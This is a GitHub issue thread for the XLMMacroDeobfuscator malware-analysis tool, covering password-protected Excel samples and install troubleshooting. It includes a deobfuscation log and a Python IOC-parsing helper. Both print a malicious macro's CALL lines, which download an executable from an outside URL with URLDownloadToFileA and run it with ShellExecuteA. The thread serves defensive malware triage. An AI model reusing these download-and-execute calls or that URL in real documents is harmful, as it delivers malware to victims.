DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
Apache License 2.0
568 stars, 115 forks

Support for password protected documents #41

Closed Maijin closed 4 years ago

Maijin commented 4 years ago

Support to provide a password.

Example of sample: https://www.virustotal.com/gui/file/3fbc4f03bd9e52de5042b656f87c11d44128246e657eb65cb2944c490df86948/detection

Password for the macro - "CaseExport"

DissectMalware commented 4 years ago

This is added. Now you can use --password

          _        _______
|\     /|( \      (       )
( \   / )| (      | () () |
 \ (_) / | |      | || || |
  ) _ (  | |      | |(_)| |
 / ( ) \ | |      | |   | |
( /   \ )| (____/\| )   ( |
|/     \|(_______/|/     \|
   ______   _______  _______  ______   _______           _______  _______  _______ _________ _______  _______
  (  __  \ (  ____ \(  ___  )(  ___ \ (  ____ \|\     /|(  ____ \(  ____ \(  ___  )\__   __/(  ___  )(  ____ )
  | (  \  )| (    \/| (   ) || (   ) )| (    \/| )   ( || (    \/| (    \/| (   ) |   ) (   | (   ) || (    )|
  | |   ) || (__    | |   | || (__/ / | (__    | |   | || (_____ | |      | (___) |   | |   | |   | || (____)|
  | |   | ||  __)   | |   | ||  __ (  |  __)   | |   | |(_____  )| |      |  ___  |   | |   | |   | ||     __)
  | |   ) || (      | |   | || (  \ \ | (      | |   | |      ) || |      | (   ) |   | |   | |   | || (\ (
  | (__/  )| (____/\| (___) || )___) )| )      | (___) |/\____) || (____/\| )   ( |   | |   | (___) || ) \ \__
  (______/ (_______/(_______)|/ \___/ |/       (_______)\_______)(_______/|/     \|   )_(   (_______)|/   \__/

XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: C:\Users\user\Downloads\samples\encrypted\3fbc4f03bd9e52de5042b656f87c11d44128246e657eb65cb2944c490df86948

Encrypted xls file
[Loading Cells]
auto_open: auto_open->SODXOFScMLykMiu!$AJ$1892
[Starting Deobfuscation]
CELL:AJ1892    , FullEvaluation      , RUN(SODXOFScMLykMiu!DE1231)
CELL:DE1231    , FullEvaluation      , RUN(SODXOFScMLykMiu!IB533)
CELL:IB533     , FullEvaluation      , RUN(SODXOFScMLykMiu!BU1660)
CELL:BU1660    , FullEvaluation      , RUN(SODXOFScMLykMiu!HO1531)
CELL:HO1531    , FullEvaluation      , RUN(SODXOFScMLykMiu!FM801)
CELL:FM801     , FullEvaluation      , RUN(SODXOFScMLykMiu!HX103)
CELL:HX103     , FullEvaluation      , RUN(SODXOFScMLykMiu!IL1999)
CELL:IL1999    , FullEvaluation      , RUN(SODXOFScMLykMiu!AV301)
CELL:AV301     , FullEvaluation      , RUN(SODXOFScMLykMiu!DJ983)
CELL:DJ983     , FullEvaluation      , RUN(SODXOFScMLykMiu!GB1499)
CELL:GB1499    , FullEvaluation      , RUN(SODXOFScMLykMiu!HB1146)
CELL:HB1146    , FullEvaluation      , RUN(SODXOFScMLykMiu!GW1150)
CELL:GW1150    , FullEvaluation      , RUN(SODXOFScMLykMiu!IE1976)
CELL:IE1976    , FullEvaluation      , RUN(SODXOFScMLykMiu!GJ1965)
CELL:GJ1965    , FullEvaluation      , RUN(SODXOFScMLykMiu!FD689)
CELL:FD689     , FullEvaluation      , RUN(SODXOFScMLykMiu!IL1604)
CELL:IL1604    , FullEvaluation      , RUN(SODXOFScMLykMiu!GY366)
CELL:GY366     , FullEvaluation      , RUN(SODXOFScMLykMiu!M81)
CELL:M81       , FullEvaluation      , RUN(SODXOFScMLykMiu!E1006)
CELL:E1006     , FullEvaluation      , RUN(SODXOFScMLykMiu!EC1970)
CELL:EC1970    , FullEvaluation      , RUN(SODXOFScMLykMiu!DZ879)
CELL:DZ879     , FullEvaluation      , RUN(SODXOFScMLykMiu!AR268)
CELL:AR268     , FullEvaluation      , RUN(SODXOFScMLykMiu!BZ1448)
CELL:BZ1448    , FullEvaluation      , RUN(SODXOFScMLykMiu!DF1899)
CELL:DF1899    , FullEvaluation      , RUN(SODXOFScMLykMiu!EH1557)
CELL:EH1557    , FullEvaluation      , RUN(SODXOFScMLykMiu!EI1443)
CELL:EI1443    , FullEvaluation      , RUN(SODXOFScMLykMiu!AH924)
CELL:AH924     , FullEvaluation      , RUN(SODXOFScMLykMiu!CK584)
CELL:CK584     , FullEvaluation      , RUN(SODXOFScMLykMiu!FA493)
CELL:FA493     , FullEvaluation      , RUN(SODXOFScMLykMiu!FH97)
CELL:FH97      , FullEvaluation      , RUN(SODXOFScMLykMiu!DN1583)
CELL:DN1583    , FullEvaluation      , RUN(SODXOFScMLykMiu!BW524)
CELL:BW524     , FullEvaluation      , RUN(SODXOFScMLykMiu!GI653)
CELL:GI653     , FullEvaluation      , RUN(SODXOFScMLykMiu!FT1548)
CELL:FT1548    , FullEvaluation      , RUN(SODXOFScMLykMiu!GS680)
CELL:GS680     , FullEvaluation      , RUN(SODXOFScMLykMiu!X1432)
CELL:X1432     , FullEvaluation      , RUN(SODXOFScMLykMiu!HE1355)
CELL:HE1355    , FullEvaluation      , RUN(SODXOFScMLykMiu!FB898)
CELL:FB898     , FullEvaluation      , RUN(SODXOFScMLykMiu!EU12)
CELL:EU12      , FullEvaluation      , RUN(SODXOFScMLykMiu!HR741)
CELL:HR741     , FullEvaluation      , RUN(SODXOFScMLykMiu!FT1961)
CELL:FT1961    , FullEvaluation      , RUN(SODXOFScMLykMiu!DN809)
CELL:DN809     , FullEvaluation      , RUN(SODXOFScMLykMiu!DF1607)
CELL:DF1607    , FullEvaluation      , RUN(SODXOFScMLykMiu!HT374)
CELL:HT374     , FullEvaluation      , RUN(SODXOFScMLykMiu!BE319)
CELL:BE319     , FullEvaluation      , RUN(SODXOFScMLykMiu!FZ1824)
CELL:FZ1824    , FullEvaluation      , RUN(SODXOFScMLykMiu!BS113)
CELL:BS113     , FullEvaluation      , RUN(SODXOFScMLykMiu!K1343)
CELL:K1343     , FullEvaluation      , RUN(SODXOFScMLykMiu!AX1293)
CELL:AX1293    , FullEvaluation      , RUN(SODXOFScMLykMiu!DI1828)
CELL:DI1828    , FullEvaluation      , RUN(SODXOFScMLykMiu!ES1414)
CELL:ES1414    , FullEvaluation      , RUN(SODXOFScMLykMiu!FR1988)
CELL:FR1988    , FullEvaluation      , RUN(SODXOFScMLykMiu!DQ865)
CELL:DQ865     , FullEvaluation      , RUN(SODXOFScMLykMiu!FO177)
CELL:FO177     , FullEvaluation      , RUN(SODXOFScMLykMiu!CU1489)
CELL:CU1489    , FullEvaluation      , RUN(SODXOFScMLykMiu!CI975)
CELL:CI975     , FullEvaluation      , RUN(SODXOFScMLykMiu!EV1486)
CELL:EV1486    , FullEvaluation      , RUN(SODXOFScMLykMiu!EB1379)
CELL:EB1379    , FullEvaluation      , RUN(SODXOFScMLykMiu!GQ1208)
CELL:GQ1208    , FullEvaluation      , RUN(SODXOFScMLykMiu!CM1059)
CELL:CM1059    , FullEvaluation      , RUN(SODXOFScMLykMiu!R1740)
CELL:R1740     , FullEvaluation      , RUN(SODXOFScMLykMiu!AL1898)
CELL:AL1898    , FullEvaluation      , RUN(SODXOFScMLykMiu!FS1510)
CELL:FS1510    , FullEvaluation      , RUN(SODXOFScMLykMiu!BB1041)
CELL:BB1041    , FullEvaluation      , RUN(SODXOFScMLykMiu!BS1618)
CELL:BS1618    , FullEvaluation      , RUN(SODXOFScMLykMiu!GD893)
CELL:GD893     , FullEvaluation      , RUN(SODXOFScMLykMiu!CU813)
CELL:CU813     , FullEvaluation      , RUN(SODXOFScMLykMiu!AY1175)
CELL:AY1175    , FullEvaluation      , RUN(SODXOFScMLykMiu!A1204)
CELL:A1204     , FullEvaluation      , RUN(SODXOFScMLykMiu!IE1256)
CELL:IE1256    , FullEvaluation      , RUN(SODXOFScMLykMiu!GR1403)
CELL:GR1403    , FullEvaluation      , RUN(SODXOFScMLykMiu!U1941)
CELL:U1941     , FullEvaluation      , RUN(SODXOFScMLykMiu!HP286)
CELL:HP286     , FullEvaluation      , RUN(SODXOFScMLykMiu!AV1809)
CELL:AV1809    , FullEvaluation      , RUN(SODXOFScMLykMiu!BX1101)
CELL:BX1101    , FullEvaluation      , RUN(SODXOFScMLykMiu!S1290)
CELL:S1290     , FullEvaluation      , RUN(SODXOFScMLykMiu!HV1162)
CELL:HV1162    , FullEvaluation      , RUN(SODXOFScMLykMiu!FH1567)
CELL:FH1567    , FullEvaluation      , RUN(SODXOFScMLykMiu!FK1978)
CELL:FK1978    , FullEvaluation      , RUN(SODXOFScMLykMiu!HO1505)
CELL:HO1505    , FullEvaluation      , RUN(SODXOFScMLykMiu!BF332)
CELL:BF332     , FullEvaluation      , RUN(SODXOFScMLykMiu!CL1933)
CELL:CL1933    , FullEvaluation      , RUN(SODXOFScMLykMiu!D681)
CELL:D681      , FullEvaluation      , RUN(SODXOFScMLykMiu!HE9)
CELL:HE9       , FullEvaluation      , RUN(SODXOFScMLykMiu!BY578)
CELL:BY578     , FullEvaluation      , RUN(SODXOFScMLykMiu!AP1706)
CELL:AP1706    , FullEvaluation      , RUN(SODXOFScMLykMiu!DD1905)
CELL:DD1905    , FullEvaluation      , RUN(SODXOFScMLykMiu!GQ1278)
CELL:GQ1278    , FullEvaluation      , RUN(SODXOFScMLykMiu!AX1258)
CELL:AX1258    , FullEvaluation      , RUN(SODXOFScMLykMiu!EM865)
CELL:EM865     , FullEvaluation      , RUN(SODXOFScMLykMiu!AK29)
CELL:AK29      , FullEvaluation      , RUN(SODXOFScMLykMiu!IA1434)
CELL:IA1434    , FullEvaluation      , RUN(SODXOFScMLykMiu!BW1536)
CELL:BW1536    , FullEvaluation      , RUN(SODXOFScMLykMiu!DS245)
CELL:DS245     , FullEvaluation      , RUN(SODXOFScMLykMiu!DP380)
CELL:DP380     , FullEvaluation      , RUN(SODXOFScMLykMiu!HV1392)
CELL:HV1392    , FullEvaluation      , RUN(SODXOFScMLykMiu!GM781)
CELL:GM781     , FullEvaluation      , RUN(SODXOFScMLykMiu!EC1752)
CELL:EC1752    , FullEvaluation      , RUN(SODXOFScMLykMiu!AG83)
CELL:AG83      , FullEvaluation      , RUN(SODXOFScMLykMiu!R1190)
CELL:R1190     , FullEvaluation      , RUN(SODXOFScMLykMiu!AK187)
CELL:AK188     , FullEvaluation      , RUN(SODXOFScMLykMiu!BT794)
CELL:BT794     , FullEvaluation      , FORMULA("https://alwaslapps.com/attachment/attach.php",$BB$54)
CELL:BT795     , FullEvaluation      , RUN(SODXOFScMLykMiu!BO869)
CELL:BO870     , FullEvaluation      , RUN(SODXOFScMLykMiu!C441)
CELL:C441      , FullEvaluation      , FORMULA("C:\RzzmZzW\jxfwimM\HDrMCsH.exe",$DA$872)
CELL:C442      , FullEvaluation      , RUN(SODXOFScMLykMiu!GO844)
CELL:GO845     , FullEvaluation      , RUN(SODXOFScMLykMiu!DY1142)
CELL:DY1142    , FullEvaluation      , FORMULA("C:\RzzmZzW\jxfwimM\HDrMCsH.exe",$GO$835)
CELL:DY1143    , FullEvaluation      , RUN(SODXOFScMLykMiu!R1332)
CELL:R1333     , FullEvaluation      , RUN(SODXOFScMLykMiu!G1771)
CELL:G1771     , FullEvaluation      , FORMULA("URLMON",$AA$1470)
CELL:G1772     , FullEvaluation      , RUN(SODXOFScMLykMiu!CL1155)
CELL:CL1156    , FullEvaluation      , RUN(SODXOFScMLykMiu!CX428)
CELL:CX428     , FullEvaluation      , FORMULA("URLDownloadToFileA",$IN$799)
CELL:CX429     , FullEvaluation      , RUN(SODXOFScMLykMiu!O612)
CELL:O613      , FullEvaluation      , RUN(SODXOFScMLykMiu!EM1722)
CELL:EM1722    , FullEvaluation      , FORMULA("JJCCJJ",$GA$737)
CELL:EM1723    , FullEvaluation      , RUN(SODXOFScMLykMiu!F375)
CELL:F376      , FullEvaluation      , RUN(SODXOFScMLykMiu!FQ1809)
CELL:FQ1809    , FullEvaluation      , FORMULA("Shell32",$AJ$179)
CELL:FQ1810    , FullEvaluation      , RUN(SODXOFScMLykMiu!V138)
CELL:V139      , FullEvaluation      , RUN(SODXOFScMLykMiu!AI1582)
CELL:AI1582    , FullEvaluation      , FORMULA("ShellExecuteA",$GZ$149)
CELL:AI1583    , FullEvaluation      , RUN(SODXOFScMLykMiu!HF997)
CELL:HF998     , FullEvaluation      , RUN(SODXOFScMLykMiu!HQ1436)
CELL:HQ1436    , FullEvaluation      , FORMULA("JJCCCCJ",$K$1550)
CELL:HQ1437    , FullEvaluation      , RUN(SODXOFScMLykMiu!AJ403)
CELL:AJ404     , FullEvaluation      , RUN(SODXOFScMLykMiu!GY1132)
CELL:GY1132    , FullEvaluation      , FORMULA("Open",$DO$1091)
CELL:GY1133    , FullEvaluation      , RUN(SODXOFScMLykMiu!HK1081)
CELL:HK1082    , FullEvaluation      , RUN(SODXOFScMLykMiu!EH465)
CELL:EH465     , FullEvaluation      , FORMULA("regsvr32.exe",$AN$1976)
CELL:EH466     , FullEvaluation      , RUN(SODXOFScMLykMiu!HM1937)
CELL:HM1938    , FullEvaluation      , RUN(SODXOFScMLykMiu!CP1990)
CELL:CP1990    , FullEvaluation      , FORMULA("rundll32.exe",$GX$811)
CELL:CP1991    , FullEvaluation      , RUN(SODXOFScMLykMiu!AA643)
CELL:AA644     , FullEvaluation      , RUN(SODXOFScMLykMiu!AO18)
CELL:AO18      , FullEvaluation      , FORMULA("C:\RzzmZzW",$AH$649)
CELL:AO19      , FullEvaluation      , RUN(SODXOFScMLykMiu!B755)
CELL:B756      , FullEvaluation      , RUN(SODXOFScMLykMiu!FP996)
CELL:FP996     , FullEvaluation      , FORMULA("C:\RzzmZzW\jxfwimM",$EW$1522)
CELL:FP997     , FullEvaluation      , RUN(SODXOFScMLykMiu!EU1625)
CELL:EU1626    , FullEvaluation      , RUN(SODXOFScMLykMiu!EY1062)
CELL:EY1062    , FullEvaluation      , FORMULA("Kernel32",$BN$639)
CELL:EY1063    , FullEvaluation      , RUN(SODXOFScMLykMiu!HX479)
CELL:HX480     , FullEvaluation      , RUN(SODXOFScMLykMiu!EI47)
CELL:EI47      , FullEvaluation      , FORMULA("CreateDirectoryA",$IK$949)
CELL:EI48      , FullEvaluation      , RUN(SODXOFScMLykMiu!GS1958)
CELL:GS1959    , FullEvaluation      , RUN(SODXOFScMLykMiu!FV712)
CELL:FV712     , FullEvaluation      , FORMULA("JCJ",$IH$1515)
CELL:FV713     , FullEvaluation      , RUN(SODXOFScMLykMiu!R1191)
CELL:R1191     , FullEvaluation      , CALL("Kernel32","CreateDirectoryA","JCJ","C:\RzzmZzW",0)
CELL:R1192     , FullEvaluation      , CALL("Kernel32","CreateDirectoryA","JCJ","C:\RzzmZzW\jxfwimM",0)
CELL:R1194     , FullEvaluation      , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"https://alwaslapps.com/attachment/attach.php","C:\RzzmZzW\jxfwimM\HDrMCsH.exe",0,0)
CELL:R1195     , FullEvaluation      , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\RzzmZzW\jxfwimM\HDrMCsH.exe",,0,0)
CELL:R1198     , End                 , HALT()
[END of Deobfuscation]
time elapsed: 1.9595320224761963
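The output above is what a triage analyst actually consumes: the final `CALL(...)` lines name the DLL, the exported function, the XLM type string and the arguments, and that is where the download URL, the drop path and the execution step live. The following script is an added example and is not part of XLMMacroDeobfuscator. It builds the `-p`/`-f` invocation used in this thread, optionally decrypts the workbook first with msoffcrypto-tool (the library the deobfuscator uses for encrypted files, assumed installed only if you call that function), and parses the evaluated lines into a list of Win32 calls plus URL and path IOCs. The sample output embedded in the block is a constructed excerpt of the log quoted above; the helper names and the `-p`-before-`-f` argument order are this example's own choices.

```python
"""Triage helper for XLMMacroDeobfuscator output on a password-protected .xls.
Added example, not project code: build the CLI call, optionally pre-decrypt
with msoffcrypto-tool, and parse CALL()/FORMULA() lines into IOCs."""
import re
import subprocess
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: an excerpt of the deobfuscation log quoted in this thread.
SAMPLE_OUTPUT = r"""Encrypted xls file
[Loading Cells]
auto_open: auto_open->SODXOFScMLykMiu!$AJ$1892
[Starting Deobfuscation]
CELL:AJ1892    , FullEvaluation      , RUN(SODXOFScMLykMiu!DE1231)
CELL:BT794     , FullEvaluation      , FORMULA("https://alwaslapps.com/attachment/attach.php",$BB$54)
CELL:R1191     , FullEvaluation      , CALL("Kernel32","CreateDirectoryA","JCJ","C:\RzzmZzW",0)
CELL:R1192     , FullEvaluation      , CALL("Kernel32","CreateDirectoryA","JCJ","C:\RzzmZzW\jxfwimM",0)
CELL:R1194     , FullEvaluation      , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"https://alwaslapps.com/attachment/attach.php","C:\RzzmZzW\jxfwimM\HDrMCsH.exe",0,0)
CELL:R1195     , FullEvaluation      , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\RzzmZzW\jxfwimM\HDrMCsH.exe",,0,0)
CELL:R1198     , End                 , HALT()
[END of Deobfuscation]
"""

LINE_RE = re.compile(r"^CELL:(\S+)\s*,\s*(\S+)\s*,\s*(\w+)\((.*)\)\s*$")
URL_RE = re.compile(r"^https?://", re.I)
WIN_PATH_RE = re.compile(r"^[A-Za-z]:\\")


@dataclass
class Win32Call:
    cell: str
    dll: str
    func: str
    typestr: str       # XLM CALL type string, e.g. "JJCCJJ" (J = long, C = char*)
    params: List[str]  # remaining arguments, quotes stripped, empty slots kept


def split_args(s: str) -> List[str]:
    """Split an argument list on commas outside double quotes; the empty slot
    in ShellExecuteA's ',,' is preserved so parameter positions stay aligned."""
    args, cur, in_quote = [], [], False
    for c in s:
        if c == '"':
            in_quote = not in_quote
        elif c == "," and not in_quote:
            args.append("".join(cur).strip())
            cur = []
            continue
        cur.append(c)
    args.append("".join(cur).strip())
    return args


def unquote(a: str) -> str:
    return a[1:-1] if len(a) >= 2 and a[0] == a[-1] == '"' else a


def _dedupe(items: List[str]) -> List[str]:
    out: List[str] = []
    for i in items:
        if i not in out:
            out.append(i)
    return out


def parse_output(text: str) -> Dict[str, object]:
    """Collect CALL() invocations and every quoted literal (FORMULA() stages
    strings into cells before CALL() uses them, so both are IOC sources)."""
    calls: List[Win32Call] = []
    literals: List[str] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        cell, _status, func, argstr = m.groups()
        raw = split_args(argstr)
        args = [unquote(a) for a in raw]
        literals.extend(a for a, r in zip(args, raw) if r.startswith('"'))
        if func == "CALL" and len(args) >= 3:
            calls.append(Win32Call(cell, args[0], args[1], args[2], args[3:]))
    executed = [p for c in calls if c.func == "ShellExecuteA"
                for p in c.params if WIN_PATH_RE.match(p)]
    return {
        "encrypted": "Encrypted xls file" in text,
        "calls": calls,
        "urls": _dedupe([l for l in literals if URL_RE.match(l)]),
        "paths": _dedupe([l for l in literals if WIN_PATH_RE.match(l)]),
        "executed": _dedupe(executed),
    }


def build_command(sample: str, password: Optional[str] = None) -> List[str]:
    """The invocation used in this thread: xlmdeobfuscator -p <pw> -f <file>."""
    cmd = ["xlmdeobfuscator"]
    if password is not None:
        cmd += ["-p", password]
    return cmd + ["-f", sample]


def run_xlmdeobfuscator(sample: str, password: Optional[str] = None) -> Dict[str, object]:
    proc = subprocess.run(build_command(sample, password), capture_output=True, text=True)
    if proc.returncode != 0:  # a negative code means the process was killed by a signal (the "abort" below)
        raise RuntimeError(f"xlmdeobfuscator exited {proc.returncode}: {proc.stderr.strip()}")
    return parse_output(proc.stdout)


def decrypt_workbook(src: str, dst: str, password: str) -> None:
    """Fallback when decryption inside the tool fails: write a plaintext copy
    with msoffcrypto-tool (pip install msoffcrypto-tool), then run the tool on it."""
    import msoffcrypto  # assumed installed; imported lazily so parsing works without it
    with open(src, "rb") as fin, open(dst, "wb") as fout:
        office = msoffcrypto.OfficeFile(fin)
        office.load_key(password=password)
        office.decrypt(fout)
```

On the sample above, `parse_output` yields the two `CreateDirectoryA` calls, the `URLDownloadToFileA` fetch of `https://alwaslapps.com/attachment/attach.php` into `C:\RzzmZzW\jxfwimM\HDrMCsH.exe`, and the `ShellExecuteA` that launches it; the `executed` list is the one to hand to detection, since a dropped file that is never run is a weaker indicator than one that is.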

Maijin commented 4 years ago

Just tried on latest git version and the program is aborting:

xlmdeobfuscator -p CaseExport -f 3fbc4f03bd9e52de5042b656f87c11d44128246e657eb65cb2944c490df86948
pywin32 is not installed (only is required if you want to use MS Excel)

XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: /Users/maijin/Projects/Reverse/#_SAMPLES/3fbc4f03bd9e52de5042b656f87c11d44128246e657eb65cb2944c490df86948

[1]    7162 abort      xlmdeobfuscator -p CaseExport -f

Same with quotes or without the -p parameter.

DissectMalware commented 4 years ago

Seems to be a failure in msoffcrypt as xlmdeobfuscator does not show this message. On my system I can decrypt this file successfully and cannot reproduce your output. Can you try to update once again? pip install -U XLMMacroDeobfuscator --force

Can you also tell me the setting you are using to run this command?

DissectMalware commented 4 years ago

I tested on Mac, and it seems it is working

[image: screenshot of the command running on Mac]

Please in addition to specifying the system you are testing on, provide the full command.

Maijin commented 4 years ago

Ok, looks like again the pip3 install/uninstall doesn't clean up the dependencies properly; I have reinstalled all of them and now it works.

DissectMalware commented 4 years ago

Please share how you addressed the issue. Didn't --force help?

I want to update the README to prevent similar issues; that's why I am asking.